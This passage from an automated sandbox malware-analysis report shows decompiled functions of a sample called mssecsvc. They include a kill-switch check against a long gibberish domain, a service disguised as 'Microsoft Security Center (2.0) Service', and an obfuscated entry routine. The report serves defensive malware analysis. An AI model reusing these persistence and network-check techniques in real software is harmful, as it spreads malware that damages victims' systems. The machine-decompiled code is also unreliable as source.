                    • Associated: 00000006.00000002.471579599.0000000000401000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471642720.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471671860.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471818802.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.473832728.0000000000A71000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                    • String ID:
                    • API String ID: 801014965-0
                    • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                    • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				InternetCloseHandle(_t27); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}















                    0x00408155
                    0x00408157
                    0x00408158
                    0x0040815c
                    0x00408160
                    0x00408164
                    0x00408168
                    0x0040816c
                    0x00408177
                    0x0040817b
                    0x0040818e
                    0x00408194
                    0x004081a7
                    0x004081ab
                    0x004081ad
                    0x004081b9

                    APIs
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                    • InternetCloseHandle.WININET(00000000), ref: 004081A7
                    • InternetCloseHandle.WININET(00000000), ref: 004081AB
                      • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                      • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                    Strings
                    • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                    Memory Dump Source
                    • Source File: 00000006.00000002.471579599.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.471569497.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471607605.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471642720.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471671860.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471818802.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.473832728.0000000000A71000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                    • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                    • API String ID: 774561529-2942426231
                    • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                    • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                    • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                    • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54serviceCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}






                    0x00407c56
                    0x00407c6e
                    0x00407c72
                    0x00407cd3
                    0x00407c74
                    0x00407ca7
                    0x00407cab
                    0x00407cb2
                    0x00407cb9
                    0x00407cb9
                    0x00407cbc
                    0x00407cc9
                    0x00407cc9

                    APIs
                    • sprintf.MSVCRT ref: 00407C56
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                    • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F75FB10,00000000), ref: 00407C9B
                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.471579599.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.471569497.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471607605.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471642720.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471671860.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471818802.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.473832728.0000000000A71000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                    • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                    • API String ID: 3340711343-4063779371
                    • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                    • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49serviceCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 86%
                    			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}










                    0x0040809f
                    0x004080a5
                    0x004080ab
                    0x004080ae
                    0x004080c9
                    0x004080cb
                    0x004080cd
                    0x004080e8
                    0x004080ea
                    0x004080ec
                    0x004080f1
                    0x004080fa
                    0x004080fa
                    0x004080fd
                    0x00408100
                    0x00408105
                    0x0040810e
                    0x00408116
                    0x0040811e
                    0x00408130
                    0x004080b0
                    0x004080b8
                    0x004080b8

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                    • __p___argc.MSVCRT ref: 004080A5
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                    • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F75FB10,00000000,?,004081B2), ref: 004080DC
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                    • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                    • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.471579599.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.471569497.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471607605.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471642720.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471671860.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471818802.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.473832728.0000000000A71000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                    • String ID: mssecsvc2.0
                    • API String ID: 4274534310-3729025388
                    • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                    • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:40.2%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:7
                    Total number of Limit Nodes:1

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_00409BA1 1 Function_00A71943 4 Function_00A719EB 1->4 2 Function_00409A16 2->0 2->1 3 Function_00409B8C 2->3 2->4 6 Function_00A719C8 2->6 5 Function_00409B9E

                    Executed Functions

                    Function 00409A16 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 3 409a99-409af0 call 409b8c _initterm __getmainargs _initterm 0->3 4 409a8d-409a98 __setusermatherr 0->4 7 409af2-409afa 3->7 8 409b2c-409b2f 3->8 4->3 11 409b00-409b03 7->11 12 409afc-409afe 7->12 9 409b31-409b35 8->9 10 409b09-409b0d 8->10 9->8 13 409b13-a71954 10->13 14 409b0f-409b11 10->14 11->10 15 409b05-409b06 11->15 12->7 12->11 17 a71958 13->17 14->13 14->15 15->10 17->17 18 a7195a-a71962 call a719c8 17->18 20 a71967 18->20 21 a71968-a7196a 20->21 21->21 22 a7196c-a7197e 21->22 22->20 23 a71980-a7198a 22->23 23->20 24 a7198c-a719a3 23->24 24->20 25 a719a5-a719bc call a719eb call a71943 24->25 29 a719c1 25->29 29->29
                    C-Code - Quality: 75%
                    			_entry_(void* __ebx) {
				intOrPtr _v8;
				intOrPtr _v28;
				intOrPtr _v52;
				intOrPtr _v84;
				char _v96;
				int _v100;
				char** _v104;
				intOrPtr _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				void* _v136;
				short _v152;
				char _v184;
				void* __esi;
				void* __ebp;
				intOrPtr* _t38;
				void* _t41;
				intOrPtr _t50;
				int _t57;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				void* _t66;
				void* _t71;
				intOrPtr* _t89;
				intOrPtr _t96;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t100;
				void* _t102;
				intOrPtr _t104;
				void* _t112;
				intOrPtr _t115;

				_t96 = _t98;
				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_t99 = _t98 - 0x68;
				_push(__ebx);
				_v28 = _t99;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				_t38 = __p__commode();
				_t70 =  *0x70f888;
				 *_t38 =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t41 = E00409BA1( *_adjust_fdiv);
				_t104 =  *0x431410; // 0x1
				if(_t104 == 0) {
					__setusermatherr(E00409B9E);
					_pop(_t70);
				}
				E00409B8C(_t41);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t100 = _t99 + 0x24;
				_t89 =  *_acmdln;
				_v120 = _t89;
				if( *_t89 != 0x22) {
					while(1) {
						__eflags =  *_t89 - 0x20;
						if( *_t89 <= 0x20) {
							goto L7;
						}
						_t89 = _t89 + 1;
						_v120 = _t89;
					}
				} else {
					do {
						_t89 = _t89 + 1;
						_v120 = _t89;
						_t63 =  *_t89;
					} while (_t63 != 0 && _t63 != 0x22);
					if( *_t89 == 0x22) {
						L6:
						_t89 = _t89 + 1;
						_v120 = _t89;
					}
				}
				L7:
				_t50 =  *_t89;
				if(_t50 != 0 && _t50 <= 0x20) {
					goto L6;
				}
				_v52 = 0;
				_push( &_v96);
				_t112 =  *_t100 - 0xfffffffe;
				do {
				} while (_t112 > 0);
				asm("pushad");
				_t102 =  &_v184 - 0xffffffdc;
				E00A719C8();
				goto L19;
				do {
					do {
						do {
							L19:
							_t66 = 0xffffffffffffffff;
							do {
								_t66 = _t66 - 1;
							} while (_t66 != 0);
							_t71 =  *((intOrPtr*)(_t66 + 0x3c));
							_t70 = _t71 - 0x7ffffffd;
							_t115 = _t70;
						} while (_t115 >= 0);
						asm("sbb ecx, 0x13e6");
					} while (_t115 >= 0);
					_push( *((intOrPtr*)(_t70 + _t66 - 0x7fffec1c)));
					_t102 = _t102 + 4;
					_t29 =  &_v152;
					 *_t29 = _v152 + 0xbab0;
					_t117 =  *_t29;
					_t70 = 0x1c;
				} while ( *_t29 != 0);
				_t90 = _t89 - 1;
				_push(0xa49ecbc2);
				E00A719EB(_t66);
				_v84 = _t89 - 1;
				_t57 = E00A71943(_t96, 0x11, _t90, _t117);
				_v100 = _t57;
				if(_t57 - 4 >= 0) {
					asm("cmc");
					_t61 =  *[fs:0x18];
					if(_t61 < 0) {
						_push(0xa6024027);
						_t62 = E00A719EB(_t66);
						L00A719E5();
					} else {
						_t62 =  *((intOrPtr*)(_t61 + 0x34));
					}
					if(_t62 == _t66) {
						L00A71750();
					}
					_push(0xda7ccb23);
					E00A719EB(_t66);
					_push(_v108);
					L00A719E5();
				}
				 *0x409b1a = 0xff;
				 *0x409b1b = 0x40a0a815;
				_pop(_t60);
				return _t60;
			}






































                    0x00409a17
                    0x00409a19
                    0x00409a1b
                    0x00409a20
                    0x00409a2b
                    0x00409a2c
                    0x00409a33
                    0x00409a36
                    0x00409a39
                    0x00409a3e
                    0x00409a43
                    0x00409a4a
                    0x00409a51
                    0x00409a64
                    0x00409a66
                    0x00409a6c
                    0x00409a72
                    0x00409a7b
                    0x00409a80
                    0x00409a85
                    0x00409a8b
                    0x00409a92
                    0x00409a98
                    0x00409a98
                    0x00409a99
                    0x00409a9e
                    0x00409aa3
                    0x00409aa8
                    0x00409ab2
                    0x00409acb
                    0x00409ad1
                    0x00409ad6
                    0x00409adb
                    0x00409ae0
                    0x00409ae8
                    0x00409aea
                    0x00409af0
                    0x00409b2c
                    0x00409b2c
                    0x00409b2f
                    0x00000000
                    0x00000000
                    0x00409b31
                    0x00409b32
                    0x00409b32
                    0x00409af2
                    0x00409af2
                    0x00409af2
                    0x00409af3
                    0x00409af6
                    0x00409af8
                    0x00409b03
                    0x00409b05
                    0x00409b05
                    0x00409b06
                    0x00409b06
                    0x00409b03
                    0x00409b09
                    0x00409b09
                    0x00409b0d
                    0x00000000
                    0x00000000
                    0x00409b13
                    0x00409b19
                    0x00a71954
                    0x00a71958
                    0x00a71958
                    0x00a7195e
                    0x00a7195f
                    0x00a71962
                    0x00a71962
                    0x00a71967
                    0x00a71967
                    0x00a71967
                    0x00a71967
                    0x00a71967
                    0x00a71968
                    0x00a71968
                    0x00a71968
                    0x00a71975
                    0x00a71976
                    0x00a71976
                    0x00a7197c
                    0x00a71984
                    0x00a71984
                    0x00a71990
                    0x00a71997
                    0x00a7199a
                    0x00a7199a
                    0x00a7199a
                    0x00a719a1
                    0x00a719a1
                    0x00a719a7
                    0x00a719a9
                    0x00a719ae
                    0x00a719b3
                    0x00a719bc
                    0x00a71884
                    0x00a7188b
                    0x00a71891
                    0x00a71898
                    0x00a718a2
                    0x00a718b5
                    0x00a718bc
                    0x00a718c1
                    0x00a718a4
                    0x00a718a8
                    0x00a718ab
                    0x00a719f7
                    0x00a719fd
                    0x00a719fd
                    0x00a71a02
                    0x00a71a07
                    0x00a71a0c
                    0x00a71a10
                    0x00a71a10
                    0x00a71a15
                    0x00a71a1c
                    0x00a71ad3
                    0x00a71ad4

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.486366040.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000009.00000002.486353222.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000009.00000002.486380546.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000009.00000002.486424310.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000009.00000002.486435821.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000009.00000002.486521538.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000009.00000002.487502234.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr
                    • String ID:
                    • API String ID: 1833031408-0
                    • Opcode ID: a365f86c44af7ee06adfb86f211ffad994c8d5494fd4270591a0fcda9132069a
                    • Instruction ID: 2d268dbdd5137c31dab964fb5980349a55b327ae395291bae86744ddf9a5f2fd
                    • Opcode Fuzzy Hash: a365f86c44af7ee06adfb86f211ffad994c8d5494fd4270591a0fcda9132069a
                    • Instruction Fuzzy Hash: 8441B171800308DFCB24DFA8DD41A997BB4FB09720F24823FE5A5672D2D7786906CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
				signed int _v5;
				signed char _v10;
				char _v11;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				struct _FILETIME _v32;
				struct _FILETIME _v40;
				char _v44;
				unsigned int _v72;
				intOrPtr _v96;
				intOrPtr _v100;
				unsigned int _v108;
				unsigned int _v124;
				char _v384;
				char _v644;
				char _t142;
				char _t150;
				void* _t151;
				signed char _t156;
				long _t173;
				signed char _t185;
				signed char* _t190;
				signed char* _t194;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				unsigned int _t210;
				char _t212;
				signed char _t230;
				signed int _t234;
				signed char _t238;
				void* _t263;
				unsigned int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				intOrPtr _t272;
				char* _t274;
				unsigned int _t276;
				signed int _t277;
				void* _t278;
				intOrPtr* _t280;
				void* _t281;
				intOrPtr _t282;

				_t263 = __edx;
				_t213 = __ecx;
				_t272 = _a4;
				_t208 = _t207 | 0xffffffff;
				_t280 = __ecx;
				_v24 = __ecx;
				if(_t272 < _t208) {
					L61:
					return 0x10000;
				}
				_t131 =  *__ecx;
				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L61;
				}
				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
					E00406A97(_t131);
					_pop(_t213);
				}
				 *(_t280 + 4) = _t208;
				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
					if(_t272 != _t208) {
						_t132 =  *_t280;
						if(_t272 >=  *( *_t280 + 0x10)) {
							L12:
							_t133 =  *_t280;
							if( *( *_t280 + 0x10) >= _t272) {
								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
									if(_t142 != 0) {
										L19:
										return 0x800;
									}
									_push(_v16);
									L00407700();
									_v12 = _t142;
									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
										_t281 = _a8;
										 *_t281 =  *( *_t280 + 0x10);
										strcpy( &_v644,  &_v384);
										_t209 = __imp___mbsstr;
										_t274 =  &_v644;
										while(1) {
											L21:
											_t150 =  *_t274;
											if(_t150 != 0 && _t274[1] == 0x3a) {
												break;
											}
											if(_t150 == 0x5c || _t150 == 0x2f) {
												_t274 =  &(_t274[1]);
												continue;
											} else {
												_t151 =  *_t209(_t274, "\\..\\");
												if(_t151 != 0) {
													L31:
													_t39 = _t151 + 4; // 0x4
													_t274 = _t39;
													continue;
												}
												_t151 =  *_t209(_t274, "\\../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/..\\");
												if(_t151 == 0) {
													strcpy(_t281 + 4, _t274);
													_t264 = _v72;
													_a11 = _a11 & 0x00000000;
													_v5 = _v5 & 0x00000000;
													_t156 = _t264 >> 0x0000001e & 0x00000001;
													_t230 =  !(_t264 >> 0x17) & 0x00000001;
													_t276 = _v124 >> 8;
													_t210 = 1;
													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
														_a11 = _t264 >> 0x00000001 & 0x00000001;
														_t230 = _t264 & 0x00000001;
														_v5 = _t264 >> 0x00000002 & 0x00000001;
														_t156 = _t264 >> 0x00000004 & 0x00000001;
														_t264 = _t264 >> 0x00000005 & 0x00000001;
														_t210 = _t264;
													}
													_t277 = 0;
													 *(_t281 + 0x108) = 0;
													if(_t156 != 0) {
														 *(_t281 + 0x108) = 0x10;
													}
													if(_t210 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
													}
													if(_a11 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
													}
													if(_t230 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
													}
													if(_v5 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
													}
													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
													_v40.dwHighDateTime = _t264;
													LocalFileTimeToFileTime( &_v40,  &_v32);
													_t173 = _v32.dwLowDateTime;
													_t234 = _v32.dwHighDateTime;
													_t212 = _v12;
													 *(_t281 + 0x10c) = _t173;
													 *(_t281 + 0x114) = _t173;
													 *(_t281 + 0x11c) = _t173;
													 *(_t281 + 0x110) = _t234;
													 *(_t281 + 0x118) = _t234;
													 *(_t281 + 0x120) = _t234;
													if(_v16 <= 4) {
														L57:
														if(_t212 != 0) {
															_push(_t212);
															L004076E8();
														}
														_t282 = _v24;
														memcpy(_t282 + 8, _t281, 0x12c);
														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
														goto L60;
													} else {
														while(1) {
															_v12 =  *((intOrPtr*)(_t277 + _t212));
															_v10 = _v10 & 0x00000000;
															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
															if(strcmp( &_v12, "UT") == 0) {
																break;
															}
															_t277 = _t277 + _a8 + 4;
															if(_t277 + 4 < _v16) {
																continue;
															}
															goto L57;
														}
														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
														_t185 = _t238 >> 0x00000001 & 0x00000001;
														_t278 = _t277 + 5;
														_a11 = _t185;
														_v5 = _t238 >> 0x00000002 & 0x00000001;
														if((_t238 & 0x00000001) != 0) {
															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t194 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
															_t185 = _a11;
															 *(_t281 + 0x120) = _t271;
														}
														if(_t185 != 0) {
															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t190 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
															 *(_t281 + 0x110) = _t270;
														}
														if(_v5 != 0) {
															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
															 *(_t281 + 0x118) = _t269;
														}
														goto L57;
													}
												}
												goto L31;
											}
										}
										_t274 =  &(_t274[2]);
										goto L21;
									}
									_push(_v12);
									L004076E8();
									goto L19;
								}
								return 0x700;
							}
							E00406520(_t133);
							L11:
							_pop(_t213);
							goto L12;
						}
						E004064E2(_t213, _t132);
						goto L11;
					}
					goto L8;
				} else {
					if(_t272 == _t208) {
						L8:
						_t204 = _a8;
						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
						 *((char*)(_t204 + 4)) = 0;
						 *((intOrPtr*)(_t204 + 0x108)) = 0;
						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
						 *((intOrPtr*)(_t204 + 0x110)) = 0;
						 *((intOrPtr*)(_t204 + 0x114)) = 0;
						 *((intOrPtr*)(_t204 + 0x118)) = 0;
						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
						 *((intOrPtr*)(_t204 + 0x120)) = 0;
						 *((intOrPtr*)(_t204 + 0x124)) = 0;
						 *((intOrPtr*)(_t204 + 0x128)) = 0;
						L60:
						return 0;
					}
					memcpy(_a8, _t280 + 8, 0x12c);
					goto L60;
				}
			}


















































